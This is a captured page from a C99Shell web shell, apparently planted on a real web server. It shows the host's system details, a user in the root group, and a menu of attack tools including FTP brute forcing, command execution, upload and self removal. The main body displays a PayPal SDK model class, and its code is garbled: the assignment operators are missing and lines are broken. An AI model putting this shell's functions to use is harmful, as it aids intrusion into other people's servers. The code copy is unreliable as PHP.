!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/paypal/rest-api-sdk-php/lib/PayPal/Api/   drwxr-xr-x
Free 28.66 GB of 117.98 GB (24.29%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ExternalFunding.php (2.61 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace PayPal\Api;

use 
PayPal\Common\PayPalModel;

/**
 * Class ExternalFunding
 *
 * A resource representing an external funding object.
 *
 * @package PayPal\Api
 *
 * @property string reference_id
 * @property string code
 * @property string funding_account_id
 * @property string display_text
 * @property \PayPal\Api\Amount amount
 */
class ExternalFunding extends PayPalModel
{
    
/**
     * Unique identifier for the external funding
     *
     * @param string $reference_id
     * 
     * @return $this
     */
    
public function setReferenceId($reference_id)
    {
        
$this->reference_id $reference_id;
        return 
$this;
    }

    
/**
     * Unique identifier for the external funding
     *
     * @return string
     */
    
public function getReferenceId()
    {
        return 
$this->reference_id;
    }

    
/**
     * Generic identifier for the external funding
     *
     * @param string $code
     * 
     * @return $this
     */
    
public function setCode($code)
    {
        
$this->code $code;
        return 
$this;
    }

    
/**
     * Generic identifier for the external funding
     *
     * @return string
     */
    
public function getCode()
    {
        return 
$this->code;
    }

    
/**
     * Encrypted PayPal Account identifier for the funding account
     *
     * @param string $funding_account_id
     * 
     * @return $this
     */
    
public function setFundingAccountId($funding_account_id)
    {
        
$this->funding_account_id $funding_account_id;
        return 
$this;
    }

    
/**
     * Encrypted PayPal Account identifier for the funding account
     *
     * @return string
     */
    
public function getFundingAccountId()
    {
        return 
$this->funding_account_id;
    }

    
/**
     * Description of the external funding being applied
     *
     * @param string $display_text
     * 
     * @return $this
     */
    
public function setDisplayText($display_text)
    {
        
$this->display_text $display_text;
        return 
$this;
    }

    
/**
     * Description of the external funding being applied
     *
     * @return string
     */
    
public function getDisplayText()
    {
        return 
$this->display_text;
    }

    
/**
     * Amount being funded by the external funding account
     *
     * @param \PayPal\Api\Amount $amount
     * 
     * @return $this
     */
    
public function setAmount($amount)
    {
        
$this->amount $amount;
        return 
$this;
    }

    
/**
     * Amount being funded by the external funding account
     *
     * @return \PayPal\Api\Amount
     */
    
public function getAmount()
    {
        return 
$this->amount;
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0036 ]--